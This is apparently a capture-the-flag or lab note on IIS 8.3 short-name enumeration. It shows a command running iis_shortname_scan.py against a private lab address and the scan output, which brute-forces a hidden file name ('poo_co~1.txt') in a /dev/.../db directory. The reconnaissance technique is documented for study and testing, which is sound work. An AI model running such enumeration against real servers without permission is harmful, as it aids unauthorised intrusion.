IIS Short name Enumeration
Under certain circumstances, windows 8.3 short names may be bruteforce enumerated under IIS with .net enabled.
python iis_shortname_scan.py http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/dbServer is vulnerable, please wait, scanning...
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/p~1.* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/po~1.* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/poo~1.* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_~1.* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_c~1.* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.t* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.tx* [scan in progress]
[+] //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [scan in progress]
[+] File //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
Note that * is a wildcard, matches any character zero or more times.Last updated